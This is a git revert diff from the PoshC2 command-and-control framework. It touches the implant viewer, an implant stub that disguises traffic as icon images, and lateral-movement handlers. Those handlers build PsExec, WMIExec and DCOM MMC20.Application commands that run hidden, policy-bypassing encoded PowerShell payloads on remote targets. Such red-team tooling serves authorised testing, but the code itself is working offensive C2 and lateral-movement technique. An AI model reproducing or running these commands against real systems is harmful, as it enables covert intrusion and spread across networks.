Revert "Merge branch 'master' of https://github.com/nettitude/PoshC2_Python"
This reverts commitchunking7231d9026d
, reversing changes made tod352a8e6e7
.
parent
7231d9026d
commit
9f8b17f6a6
22
C2Viewer.py
22
C2Viewer.py
|
@ -3,7 +3,6 @@
|
|||
from Colours import *
|
||||
from Config import *
|
||||
from DB import *
|
||||
from Help import *
|
||||
import time, os
|
||||
|
||||
rows = 10
|
||||
|
@ -17,10 +16,8 @@ try:
|
|||
except Exception as e:
|
||||
print "cls"
|
||||
print chr(27) + "[2J"
|
||||
|
||||
print (Colours.GREEN + "")
|
||||
print (logopic)
|
||||
print (Colours.END + "")
|
||||
print Colours.GREEN,""
|
||||
print logo, Colours.END
|
||||
|
||||
try:
|
||||
taskid = get_seqcount("CompletedTasks") + 1
|
||||
|
@ -40,7 +37,6 @@ except Exception as e:
|
|||
user = "None"
|
||||
implantid = 1
|
||||
|
||||
print newtaskid
|
||||
while(1):
|
||||
try:
|
||||
newtask = get_newtasksbyid(newtaskid)
|
||||
|
@ -56,10 +52,10 @@ while(1):
|
|||
print "Loading Shellcode",Colours.END
|
||||
elif "upload-file" in command.lower():
|
||||
print "Uploading File",Colours.END
|
||||
else:
|
||||
else:
|
||||
print command,Colours.END
|
||||
|
||||
newtaskid = newtaskid + 1
|
||||
newtaskid = newtaskid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
|
@ -69,9 +65,9 @@ while(1):
|
|||
now = datetime.datetime.now()
|
||||
if hostinfo:
|
||||
print Colours.GREEN
|
||||
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print "Command returned against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print completedtask[4],Colours.END
|
||||
taskid = taskid + 1
|
||||
taskid = taskid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
|
@ -80,12 +76,12 @@ while(1):
|
|||
if implant:
|
||||
print Colours.GREEN
|
||||
print "New %s implant connected: (uri=%s key=%s) (%s)" % (implant[15], implant[1], implant[5], now.strftime("%m/%d/%Y %H:%M:%S"))
|
||||
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
|
||||
print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (implant[4], implant[9], implant[6],
|
||||
implant[8], implant[13], implant[11], implant[10])
|
||||
print Colours.END
|
||||
implantid = implantid + 1
|
||||
implantid = implantid + 1
|
||||
except Exception as e:
|
||||
user = "None"
|
||||
|
||||
time.sleep(1)
|
||||
|
||||
|
|
@ -67,8 +67,6 @@ public class Program
|
|||
proxy.UseDefaultCredentials = false;
|
||||
proxy.BypassProxyOnLocal = false;
|
||||
x.Proxy = proxy;
|
||||
} else {
|
||||
x.UseDefaultCredentials = true;
|
||||
}
|
||||
|
||||
var df = "#REPLACEDF#";
|
||||
|
|
|
@ -242,8 +242,6 @@ while(True):
|
|||
|
||||
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
||||
opener = urllib2.build_opener()
|
||||
if (len(cmd) > 200):
|
||||
cmd = cmd[0:200]
|
||||
postcookie = encrypt(key, cmd)
|
||||
data = base64.b64decode(random.choice(icoimage))
|
||||
dataimage = data.ljust( 1500, '\\0' )
|
||||
|
|
|
@ -317,7 +317,7 @@ def startup(printhelp = ""):
|
|||
for t in comtasks:
|
||||
hostname = get_implantdetails(t[2])
|
||||
if hostname[2] not in users:
|
||||
users += "%s @ %s\n" % (hostname[2],hostname[3])
|
||||
users += "%s \n" % hostname[2]
|
||||
if "Upload-File" in t[3]:
|
||||
uploadedfile = t[3]
|
||||
uploadedfile = uploadedfile.partition("estination ")[2]
|
||||
|
@ -350,7 +350,7 @@ def startup(printhelp = ""):
|
|||
else:
|
||||
for task in tasks:
|
||||
imname = get_implantdetails(task[1])
|
||||
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
|
||||
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2])
|
||||
startup("Queued tasks:\r\n\r\n%s" % alltasks)
|
||||
|
||||
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
|
||||
|
@ -824,14 +824,18 @@ def runcommand(command, randomuri):
|
|||
|
||||
elif "invoke-psexecproxypayload" in command.lower():
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup("Need to run createproxypayload first")
|
||||
else:
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
|
||||
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
||||
new_task(cmd, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-psexecdaisypayload" in command.lower():
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri)
|
||||
|
@ -861,14 +865,18 @@ def runcommand(command, randomuri):
|
|||
|
||||
elif "invoke-wmiproxypayload" in command.lower():
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup("Need to run createproxypayload first")
|
||||
else:
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
|
||||
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
|
||||
new_task(cmd, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-wmidaisypayload" in command.lower():
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
|
||||
|
@ -897,16 +905,15 @@ def runcommand(command, randomuri):
|
|||
# dcom lateral movement
|
||||
|
||||
elif "invoke-dcomproxypayload" in command.lower():
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
p = re.compile(ur'(?<=-target.).*')
|
||||
target = re.search(p, command).group()
|
||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
||||
new_task(pscommand, randomuri)
|
||||
else:
|
||||
startup("Need to run createproxypayload first")
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
||||
C2[13], C2[11], "", "", C2[19], C2[20],
|
||||
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
||||
payload = newPayload.CreateRawBase()
|
||||
p = re.compile(ur'(?<=-target.).*')
|
||||
target = re.search(p, command).group()
|
||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||
new_task(pscommand, randomuri)
|
||||
|
||||
elif "invoke-dcomdaisypayload" in command.lower():
|
||||
daisyname = raw_input("Name required: ")
|
||||
|
|
4296
Modules/Inveigh.ps1
4296
Modules/Inveigh.ps1
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue